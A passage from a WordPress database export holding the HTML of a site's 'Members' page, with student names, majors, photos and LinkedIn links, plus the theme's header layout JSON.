767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 09:59:38','2023-10-13 13:59:38','',182,'https://gsudice.dataconn.net/?p=1728',0,'revision','',0),(1729,1,'2023-10-13 09:59:38','2023-10-13 13:59:38','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 